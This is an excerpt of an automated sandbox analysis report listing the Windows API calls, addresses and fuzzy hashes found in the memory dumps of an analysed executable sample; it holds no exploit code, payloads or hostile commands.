                                                                                            • API String ID: 1658689577-0
                                                                                            • Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                                            • Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
                                                                                            • Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                                            • Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98
                                                                                            APIs
                                                                                            • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoScroll
                                                                                            • String ID:
                                                                                            • API String ID: 629608716-0
                                                                                            • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                            • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                                                            • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                            • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                                            APIs
                                                                                              • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                              • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                            • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B526,?,00000000,?,?,0046B733,?,00000000,0046B772), ref: 0046B50A
                                                                                              • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                                              • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$A15940CurrentEnablePathPrepareThreadWrite
                                                                                            • String ID:
                                                                                            • API String ID: 1039859321-0
                                                                                            • Opcode ID: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                                            • Instruction ID: 01ed1b7c575f4ace7d1103a0bc1ae6f252d8ead66db9bed0bf215ba1be387fc5
                                                                                            • Opcode Fuzzy Hash: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                                            • Instruction Fuzzy Hash: 09F059B0244300BFE7109B32FC16B6677E8D709708F90443BF400C25C0E3794880C9AE
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                            • Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
                                                                                            • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                            • Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58
                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                                            • Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
                                                                                            • Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                                            • Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                            • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                            • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                            • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452085,00000000,004520A6,?,00000000), ref: 0042CCC3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                                            • Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
                                                                                            • Opcode Fuzzy Hash: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                                            • Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE64
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                                            • Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
                                                                                            • Opcode Fuzzy Hash: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                                            • Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9
                                                                                            APIs
                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage
                                                                                            • String ID:
                                                                                            • API String ID: 1306739567-0
                                                                                            • Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                                            • Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
                                                                                            • Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                                            • Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E
                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                            • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                                            • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                            • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                                            APIs
                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                                            • Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
                                                                                            • Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                                            • Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4
                                                                                            APIs
                                                                                            • FindClose.KERNEL32(00000000,000000FF,0046F950,00000000,0047073F,?,00000000,00470788,?,00000000,004708C1,?,00000000,0000003C,00000000), ref: 0045412A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            • Opcode ID: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                                            • Instruction ID: 5eabd71f03f270c9e36328c123aabe4f760eecb17ac4c97f42f59bce307939db
                                                                                            • Opcode Fuzzy Hash: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                                            • Instruction Fuzzy Hash: CEE065B0A04A004BCB14DF3A898425676D25FD5324F04C56AAC58CF3D6E63C84859A26
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(00493E46,?,00493E68,?,?,00000000,00493E46,?,?), ref: 004146AB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                            • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                            • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                            • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                                            • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                                                            • Opcode Fuzzy Hash: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                                            • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                                                            APIs
                                                                                              • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                                            • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                              • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoParametersSystem$ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3202724764-0
                                                                                            • Opcode ID: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
                                                                                            • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                                            • Opcode Fuzzy Hash: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
                                                                                            • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                                            APIs
                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: TextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 530164218-0
                                                                                            • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                            • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                                            • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                                            • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                            • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                            • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                            • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00450C2B,00000000), ref: 0042CCFB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
                                                                                            • Instruction ID: cee2652a42bb6fa335edebfce0b7cce520d77b1cbd3538a4821e8cc024acaa82
                                                                                            • Opcode Fuzzy Hash: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
                                                                                            • Instruction Fuzzy Hash: 66C08CE03222001A9A1065BD3CC911F06C8892833A3A41F37B438E32D2E23E88266028
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
